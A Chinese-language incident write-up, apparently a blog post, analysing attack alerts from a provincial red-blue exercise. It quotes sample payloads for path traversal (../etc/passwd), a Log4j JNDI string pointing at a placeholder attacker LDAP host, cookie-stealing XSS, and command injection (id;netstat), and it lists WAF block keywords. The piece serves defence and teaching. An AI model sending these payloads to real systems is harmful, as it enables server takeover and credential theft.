事件某省大数据局主导的一次攻防演练中午时段遭受大量攻击。告警信息TOP 5[疑似目录穿越攻击URI] [漏洞攻击: Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)] [web路径遍历漏洞攻击-Linux环境] [XSS跨站脚本攻击URI] [代码注入远程命令执行攻击_URI]以上三条告警信息来自于同一时段不同客户、不同攻击IP疑似目录穿越、Linux 路径遍历目录遍历漏洞扫描触发条件攻击者用脚本批量在 URL 里拼接穿越路径尝试绕过访问限制读取服务器 Linux 敏感配置、密码文件、密钥。?path../../etc/passwd ?file..%2F..%2Fetc%2Fhosts黑客角度工具类型Python 批量 POC 脚本、Dirsearch、御剑扫描。黑产用法导入公网 IP 段字典多线程批量爆破 ../etc/passwd 类遍历 Payload全网地毯式筛查弱防护站点。攻击逻辑读取批量 IP 列表。自动化遍历常见敏感路径如/etc/passwd。多线程并发请求快速识别是否存在目录遍历漏洞。Log4j RCECVE-2021-44228 HTTP-LDAP经典核弹级漏洞批量利用脚本攻击触发条件恶意请求头 / URL 参数带入 Jndi LDAP 恶意字符串脚本批量遍历公网端口、HTTP 接口等植入该字段成功后可远程任意代码执行、接管服务器。${jndi:ldap://恶意IP/exp}黑客角度工具类型GO 语言批量扫描脚本、JNDI 恶意 LDAP 转发靶机、僵尸网络蠕虫程序。黑产用法一键批量对公网 80/443/8080 等端口发包携带 JNDIPayload批量探测未修复资产沦陷后植入木马。攻击逻辑批量扫描 80、8080、443 等常见 Web 端口。注入恶意 JNDI 载荷尝试连接攻击者控制的恶意 LDAP 服务器。若目标存在漏洞直接下发反向 Shell接管服务器。XSS 跨站脚本恶意 Payload 注入探测触发方式扫描器自动往 GET 参数、URI 路径注入 JS 恶意代码探测前端是否过滤不严尝试窃取 cookie、劫持会话、挂黑页。?qscriptalert(document.cookie)/script ?user%3Cimg%20srcx%20onerroralert(1)%3E黑客角度工具类型XSS 批量 POC 脚本、Burp Suite 自动化爬虫插件。黑产用法爬虫抓取网站所有 URL 参数自动批量注入弹窗、窃取 Cookie 类载荷筛查前端过滤漏洞。攻击逻辑爬虫抓取目标网站所有 URL 及参数。自动注入alert(1)或更复杂的 JS Payload。检测页面是否有回显判断是否存在 XSS 漏洞。代码注入 /远程命令执行 RCEWebshell、系统命令注入批量探测触发方式脚本批量注入系统命令、PHP/Python 代码 Payload探测 Web 应用是否存在命令拼接漏洞直接拿下服务器权限。?cmdwhoami ?execid;netstat -an黑客角度工具类型自定义 Python 暴破脚本、暴破工具如bp。黑产用法多线程批量携带whoami、id等系统命令检测后端是否拼接执行命令快速拿下服务器权限。攻击逻辑针对 URL 参数或 POST 数据。批量尝试注入id、cat /etc/passwd等命令。根据回显内容判断是否可以执行系统命令。共性特征全是脚本化、自动化、规模化扫描攻击黑客攻击路线资产测绘发现目标 - 批量导入扫描器工具、脚本 - 多线程并发发包 - 批量识别漏洞 - 筛选高价值目标攻击手段脚本化攻击者使用自动化工具对系统发起“地毯式”扫描。攻击路径递进攻击者可能先尝试路径遍历和XSS这类相对容易探测的漏洞进行初步信息收集或试探同时重点投放Log4j RCE这种高危漏洞的Payload试图直接获取控制权而RCE攻击告警则涵盖了其他多种可能的利用方式。防护建议1.及时更新:确保所有组件如Apache服务器、Log4j升级到已修复安全漏洞的版本。2.输入验证与输出转义对所有用户输入进行严格校验和过滤对输出到页面的内容进行编码这是防御XSS和许多注入攻击的根本。3.最小权限原则应用程序运行在最小必要权限下限制其访问文件系统和执行命令的能力。4.使用WAF部署Web应用防火墙可以有效拦截和阻断这些已知攻击模式的请求。WAF区别于NGFW专注于web应用层精准拦截与OWASP Top10相关的web攻击、应用上下文感知与业务逻辑防护WAF规则主要需对以下内容进行优化1拦截目录穿越 / Linux 路径遍历 匹配请求 URI / 参数含特征直接阻断 ../、..%2f、..%5c、/etc/passwd、/etc/shadow 2拦截 Log4j RCELDAP-JNDI 攻击 请求头、GET/POST 参数匹配关键字阻断 ${jndi:ldap、${jndi:rmi、${lower 等变形绕过特征 3拦截 XSS 跨站脚本 拦截高频探测载荷 script、onerror、javascript:、alert( 通用 xss 探针 4拦截代码注入 远程命令执行 拦截 Linux 系统命令载荷 whoami、id、netstat、;、|、 等命令分隔符注以上内容来自于真实告警信息借助AI等理顺逻辑仅供参考学习禁止转载。如有错误观点恳请指正愿以此篇助君学习。